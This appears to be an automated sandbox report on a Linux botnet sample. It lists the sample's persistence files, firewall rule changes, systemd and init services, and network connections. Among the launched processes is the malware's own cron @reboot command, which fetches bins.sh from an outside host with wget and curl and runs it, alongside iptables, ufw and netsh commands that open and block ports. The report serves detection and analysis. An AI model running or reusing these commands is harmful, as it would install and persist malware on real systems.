Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
- /etc/init.d/job
Malicious functions:
Launches itself as a daemon
Substitutes application name for:
- /bin/bash
Manages services:
- ['/bin/systemctl', 'enable', 'bot']
Launches processes:
- /sbin/xtables-multi iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- /bin/sh -c /usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- /bin/sh -c /bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- sudo pfctl -f -
- /bin/sh /bin/bins.sh
- /bin/sh -c ufw deny 37215/udp
- chmod 777 /bin/bins.sh
- /bin/sh -c /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_UDP\x22 dir=in action=block protocol=UDP localport=37215
- /bin/kmod /sbin/modprobe ip_tables
- /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_TCP\x22 dir=in action=block protocol=TCP localport=37215
- /bin/sh -c iptables -A INPUT -p tcp --dport 37215 -j DROP
- crontab -l
- /bin/sh -c busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- chmod +x /bin/bins.sh
- /sbin/xtables-multi iptables -A INPUT -p udp --dport 37215 -j DROP
- /bin/systemctl enable bot
- /bin/sh -c echo \x22block drop proto udp from any to any port 37215\x22 | sudo pfctl -f -
- /bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22udp\x22 port=\x2237215\x22 reject\x27
- /bin/sh -c echo \x22block drop proto tcp from any to any port 37215\x22 | sudo pfctl -f -
- /sbin/initctl start bot
- busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- /bin/sh -c nft add rule ip filter input udp dport 37215 drop
- /bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22tcp\x22 port=\x2237215\x22 reject\x27
- /bin/sh -c iptables -A INPUT -p udp --dport 37215 -j DROP
- /bin/sh -c ufw deny 37215/tcp
- /bin/sh -c nft add rule ip filter input tcp dport 37215 drop
- /bin/sh -c iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
- crontab -
- /bin/sh -c (crontab -l ; echo \x22@reboot /bin/bash -c \x22/bin/wget http://rebirthltd.com/bins.sh; chmod 777 /bin/bins.sh; /bin/sh /bin/bins.sh; /bin/curl -k -L --output /bin/bins.sh http://rebirthltd.com/bins.sh; chmod +x /bin/bins.sh; /bin/sh /bin/bins.sh\x22\x22) | crontab -
- /sbin/xtables-multi iptables -A INPUT -p tcp --dport 37215 -j DROP
Performs operations with the file system:
Modifies file access rights:
- /var/spool/cron/crontabs/tmp.WkLAve
- /etc/init.d/job
Deletes folders:
- /xconsole
- /null
Creates or modifies files:
- /self
- /proc/830/cmdline
- /dev/full
- /var/spool/cron/crontabs/tmp.WkLAve
- /etc/init/bot.conf
- /root/.bashrc
- /lib/systemd/system/bot.service
- /etc/systemd/system/job.service
Deletes files:
- /xconsole
- /null
Changes time of creation/access/modification of files:
- /var/spool/cron/crontabs
Network activity:
Awaits incoming connections on ports:
- 127.0.0.1:8345
- 0.0.0.0:26721
Establishes connection:
- 8.#.8.8:53
- [:##]:37215
- 127.0.0.1:37215
- 13#.#95.4.2:53
- 19#.###.175.20:35342
DNS ASK:
- re###thltd.com
Sends data to the following servers:
- 19#.###.175.20:35342
Receives data from the following servers:
- 19#.###.175.20:35342
Other:
Collects information about network activity
